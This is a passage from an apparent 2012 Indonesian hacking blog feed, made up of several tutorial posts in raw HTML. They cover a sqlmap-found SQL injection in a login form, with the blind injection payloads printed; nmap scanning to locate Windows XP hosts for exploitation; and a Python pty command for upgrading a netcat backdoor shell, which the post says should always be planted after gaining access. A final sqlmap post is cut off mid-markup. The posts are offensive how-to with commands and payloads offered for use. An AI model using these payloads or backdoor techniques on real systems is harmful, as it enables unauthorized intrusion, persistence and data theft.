--risk=5&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-L3A1BZK36Os/T4PHIyLwe3I/AAAAAAAABSg/mG9bC_PZGBo/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="166" src="http://1.bp.blogspot.com/-L3A1BZK36Os/T4PHIyLwe3I/AAAAAAAABSg/mG9bC_PZGBo/s320/8.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;Kemudian muncul lagi:&lt;/div&gt;&lt;div&gt;sqlmap got a 302 redirect to 'http://172.16.33.131:80/login_success.php'. Do you want to follow? [Y/n]&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Saya tekan "n" [tanpa tanda kutip], kemudian "enter"&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Dan muncul pesan yang membahagiakan:&lt;/div&gt;&lt;div&gt;&lt;b&gt;POST parameter 'mypassword' is vulnerable&lt;/b&gt;. Do you want to keep testing the others (if any)? [y/N]&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Saya jawab "n", kemudian "enter".&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Dan payload untuk website ini adalah:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;&lt;span style="color: red;"&gt;Place: POST&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style="color: red;"&gt;Parameter: mypassword&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;nbsp; &amp;nbsp; Type: boolean-based blind&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;nbsp; &amp;nbsp; Title: OR boolean-based blind - WHERE or HAVING clause&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;nbsp; &amp;nbsp; Payload: POSTDATA=myusername=admin&amp;amp;mypassword=-3973' OR (5599=5599) AND 'eHOv'='eHOv&amp;amp;Submit=Login&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;nbsp; &amp;nbsp; Type: AND/OR time-based blind&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;nbsp; &amp;nbsp; Title: MySQL &amp;lt; 5.0.12 AND time-based blind (heavy query)&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;nbsp; &amp;nbsp; Payload: POSTDATA=myusername=admin&amp;amp;mypassword=123' AND 2246=BENCHMARK(5000000,MD5(0x77544b50)) AND 'bGtM'='bGtM&amp;amp;Submit=Login&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-RZLphLYq6a0/T4PHCKB5sZI/AAAAAAAABSY/bFhO9zPyabQ/s1600/9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="166" src="http://3.bp.blogspot.com/-RZLphLYq6a0/T4PHCKB5sZI/AAAAAAAABSY/bFhO9zPyabQ/s320/9.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Sempurna....&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;created by :&lt;span style="color: red;"&gt; red-dragon&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4322924474312123143-7544942465614747891?l=www.root-bt.co.cc' alt='' /&gt;&lt;/div&gt;</description><link>http://www.root-bt.co.cc/2012/04/sql-injection-level-4-part-1.html</link><author>noreply@blogger.com (Double Dragon)</author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/-ldZk1SKKDXU/T4PBED_g47I/AAAAAAAABRg/S6a6PI0as7s/s72-c/1.png' height='72' width='72'/><thr:total>1</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-4322924474312123143.post-1461139037860303345</guid><pubDate>Wed, 21 Mar 2012 05:54:00 +0000</pubDate><atom:updated>2012-03-21T12:54:31.759+07:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>Information Gathering</category><category domain='http://www.blogger.com/atom/ns#'>nmap</category><category domain='http://www.blogger.com/atom/ns#'>exploitation</category><title>Hunting Windows XP with NMAP</title><description>Kalian yang gemar melakukan exploitasi system, mungkin mengincar system operasi windows XP. Ada beberapa tools yang bisa digunakan untuk melakukan information gathering guna memburu system operasi ini. Diantaranya yang terkenal adalah:&lt;span class="fullpost"&gt; &lt;/span&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;ol&gt;&lt;li&gt;Angry IP Scanner&lt;/li&gt;&lt;li&gt;NMAP&lt;/li&gt;&lt;/ol&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;Masalahnya adalah, anda tidak bisa mendeteksi OS yang digunakan oleh sebuah host jika anda menggunakan Angry IP Scanner. Karena Angry IP scanner hanya dapat mendeteksi NET BIOS pada port 445 dan 135, serta mendeteksi port 80 protokol milik HTTP.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Kita telah mengetahui bahwa NMAP mampu melakukan scanning secara detil dan cepat. Dan parameter yang bisa digunakan untuk melakukan scanning OS adalah parameter -O.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;root@dark-slayer&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: cyan;"&gt;~&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;#&lt;/span&gt;&lt;/b&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt; nmap -O &amp;lt;ip address&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Ternyata parameter ini memiliki kelemahan dalam mendeteksi OS, mengapa? Karena hasilnya tidak akurat, dan memakan waktu yang cukup lama. Bagaimana cara mengatasi hal ini?&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Pertama, anda harus mengetahui, bahwa mendeteksi OS dapat dilakukan melalui pemindaian pada port 445. Maka perintah NMAP adalah:&lt;/div&gt;&lt;div&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; font-family: monospace; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;root@dark-slayer&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: cyan;"&gt;~&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;#&lt;/span&gt;&lt;/b&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;&amp;nbsp;nmap -p 445 10.20.0.1-255&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/--sSvrIaG-6g/T2lqbzySTMI/AAAAAAAABQ0/gNWMCbN4DWQ/s1600/1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="171" src="http://2.bp.blogspot.com/--sSvrIaG-6g/T2lqbzySTMI/AAAAAAAABQ0/gNWMCbN4DWQ/s320/1.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Perintah ini akan menampilkan sederet informasi mengenai status port 445 pada setiap host dalam sebuah localhost. Langkah kedua adalah menemukan port 445 yang terbuka.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Kita telah menemukan beberapa host yang membuka port 445 nya. Diantaranya adalah:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;b&gt;10.20.0.103&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-G-4pzemzq0k/T2lrHnMFX5I/AAAAAAAABQ8/0VtYtDR1JQs/s1600/2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="171" src="http://3.bp.blogspot.com/-G-4pzemzq0k/T2lrHnMFX5I/AAAAAAAABQ8/0VtYtDR1JQs/s320/2.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;b&gt;10.20.0.192&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-GRR4sM2vets/T2lrX9FNrVI/AAAAAAAABRE/3wFEuh9CiVk/s1600/3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="171" src="http://1.bp.blogspot.com/-GRR4sM2vets/T2lrX9FNrVI/AAAAAAAABRE/3wFEuh9CiVk/s320/3.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;b&gt;10.20.0.193&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-pm6VBnws2IY/T2lrjDwabEI/AAAAAAAABRM/VxhQH1NNCe8/s1600/4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="171" src="http://2.bp.blogspot.com/-pm6VBnws2IY/T2lrjDwabEI/AAAAAAAABRM/VxhQH1NNCe8/s320/4.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Kemudian kita scan host ini satu per satu dengan perintah:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; font-family: monospace; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;root@dark-slayer&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: cyan;"&gt;~&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;#&lt;/span&gt;&lt;/b&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;&amp;nbsp;&amp;nbsp;nmap -p 445 -sV -Pn -v &amp;lt;ip address&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Kita mulai dari:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; font-family: monospace; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;root@dark-slayer&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: cyan;"&gt;~&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;#&lt;/span&gt;&lt;/b&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;&amp;nbsp;&amp;nbsp;nmap -p 445 -sV -Pn -v&amp;nbsp;10.20.0.103&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-Hj8b8lGqR1o/T2lsJzkFeaI/AAAAAAAABRU/AXlVjiHjmNQ/s1600/5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="209" src="http://1.bp.blogspot.com/-Hj8b8lGqR1o/T2lsJzkFeaI/AAAAAAAABRU/AXlVjiHjmNQ/s320/5.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Jika tidak muncul versi di sebelah kolom service. Maka sudah dapat dipastikan ini bukan windows XP. Terbukti cara ini mempersingkat waktu pemindaian, hanya memakan waktu 6 detik. Jika muncul versi di sebelah kolom service, misalkan Microsoft Windows XP, sudah dapat dipastikan bahwa host menggunakan Operasi System Windows XP.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;created by : &lt;span class="Apple-style-span" style="color: red;"&gt;red-dragon&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4322924474312123143-1461139037860303345?l=www.root-bt.co.cc' alt='' /&gt;&lt;/div&gt;</description><link>http://www.root-bt.co.cc/2012/03/hunting-windows-xp-with-nmap.html</link><author>noreply@blogger.com (Double Dragon)</author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/--sSvrIaG-6g/T2lqbzySTMI/AAAAAAAABQ0/gNWMCbN4DWQ/s72-c/1.jpg' height='72' width='72'/><thr:total>3</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-4322924474312123143.post-2541833704855006514</guid><pubDate>Mon, 19 Mar 2012 12:48:00 +0000</pubDate><atom:updated>2012-03-19T19:48:15.887+07:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>backdoor</category><category domain='http://www.blogger.com/atom/ns#'>python</category><category domain='http://www.blogger.com/atom/ns#'>tty</category><category domain='http://www.blogger.com/atom/ns#'>shell</category><category domain='http://www.blogger.com/atom/ns#'>spawn</category><title>Spawning Bash via Backdoor</title><description>Backdoor adalah elemen yang wajib ditanam ketika berhasil melakukan gaining access. Salah satu backdoor yang sering ditemukan adalah backdoor pada sebuah webserver. Dengan hanya menggunakan netcat, user mampu menembus webserver melalui port backdoor yang sudah ditentukan. Namun backdoor ini tampak hampa. Mengapa? Karena tidak ada tty yang aktif dalam shell tersebut. Akibatnya beberapa perintau seperti perintah sudo, tidak bisa dilakukan.&lt;span class="fullpost"&gt; &lt;/span&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Sebagai contoh, anda menemukan kejadian seperti ini:&lt;/div&gt;&lt;div&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-_w4LsHO1cdM/T2cpp8coUoI/AAAAAAAABQk/jUu6-P4i66U/s1600/1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="175" src="http://4.bp.blogspot.com/-_w4LsHO1cdM/T2cpp8coUoI/AAAAAAAABQk/jUu6-P4i66U/s320/1.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Tampak kosong bagaimana? Oke terlihat perbedaan antara shell yang wajar, dan backdoor shell yang satu ini. Shell yang wajar akan menampilkan&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: white; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; line-height: 18px;"&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; line-height: 18px; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;b&gt;root@root&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: green; font-family: Monaco, Consolas, Courier, monospace;"&gt;:&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="color: cyan;"&gt;~&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: green; font-family: Monaco, Consolas, Courier, monospace;"&gt;# id&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Namun di kasus ini tampak kosong!&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-size: 13px; line-height: 18px;"&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; font-size: 13px; line-height: 18px; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;id&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Untuk mengaktifkan tty, anda harus dapat mengeksekusi tty baru. Agar header root@root dapat keluar. Jika root@root:~# telah keluar, makan tty sudah terksekusi. Dan perintah sudo bisa dieksekusi. Untuk mengeksekusi tty, saya akan menggunakan python interpreter untuk mengaktifkan tty. Simple, cukup masukan perintah ini:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;python -c 'import pty; pty.spawn("/bin/sh")'&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Maka header akan tampak seperti ini&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; font-family: monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;python -c 'import pty; pty.spawn("/bin/sh")'&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;sh-3.2$&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-7lAQlNzdRjY/T2cq1NLB1QI/AAAAAAAABQs/RiVkOSn4npI/s1600/2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="175" src="http://4.bp.blogspot.com/-7lAQlNzdRjY/T2cq1NLB1QI/AAAAAAAABQs/RiVkOSn4npI/s320/2.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Sempurna&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;created by : &lt;span class="Apple-style-span" style="color: red;"&gt;red-dragon&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4322924474312123143-2541833704855006514?l=www.root-bt.co.cc' alt='' /&gt;&lt;/div&gt;</description><link>http://www.root-bt.co.cc/2012/03/spawning-bash-via-backdoor.html</link><author>noreply@blogger.com (Double Dragon)</author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/-_w4LsHO1cdM/T2cpp8coUoI/AAAAAAAABQk/jUu6-P4i66U/s72-c/1.jpg' height='72' width='72'/><thr:total>3</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-4322924474312123143.post-2308869971760516777</guid><pubDate>Sat, 10 Mar 2012 11:12:00 +0000</pubDate><atom:updated>2012-03-10T18:12:54.862+07:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>SQLmap</category><title>Fast SLQmap</title><description>SQLmap adalah program berbasis konsol untuk penetration testing database. Karena berbasis konsol maka anda harus menjalankannya melalui terminal. Dan yang melelahkan adalah, anda harus mengubah working directory ke /pentest/database/sqlmap&lt;span class="fullpost"&gt; &lt;/span&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; line-height: 18px;"&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; line-height: 18px; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;b&gt;root@root&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: green; font-family: Monaco, Consolas, Courier, monospace;"&gt;:&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="color: cyan;"&gt;~&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: green; font-family: Monaco, Consolas, Courier, monospace;"&gt;# cd /pentest/database/sqlmap&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Kemudian mengeksekusinya dengan perintah&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; line-height: 18px;"&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; 